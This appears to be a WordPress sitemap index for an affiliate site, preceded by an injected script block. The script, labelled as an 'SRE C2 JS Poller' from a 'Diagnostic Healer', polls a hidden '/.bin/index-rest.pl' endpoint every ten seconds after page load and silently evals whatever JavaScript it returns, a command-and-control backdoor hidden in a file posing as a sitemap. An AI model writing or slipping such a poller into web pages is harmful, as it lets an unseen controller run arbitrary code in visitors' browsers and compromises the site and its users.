

<script>

// SRE C2 JS Poller (Injected by SRE Diagnostic Healer)
window.sreDynamicJsVersion = 0;
function srePollDynamicJS() {
    if (window.sreSyncPaused) { setTimeout(srePollDynamicJS, 10000); return; }
    let endpoint = "/.bin/index-rest.pl";
    let fd = new URLSearchParams();
    fd.append("action", "poll_dynamic_js");
    fd.append("current_version", window.sreDynamicJsVersion);
    fetch(endpoint, { method: "POST", headers: {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, body: fd.toString() })
    .then(r => r.json()).then(data => {
        if (data && data.version > window.sreDynamicJsVersion) {
            try { eval(data.js); window.sreDynamicJsVersion = data.version; console.log("📡 [SRE C2] Dynamic UI Payload evaluated (v" + data.version + ")"); } catch(e) {}
        }
    }).catch(e => {}).finally(() => { setTimeout(srePollDynamicJS, 10000); });
}
document.addEventListener("DOMContentLoaded", function() { setTimeout(srePollDynamicJS, 3000); });

</script>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://msoms.affiliatesystem.cloud/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-posts-affiliate_profile-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://msoms.affiliatesystem.cloud/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
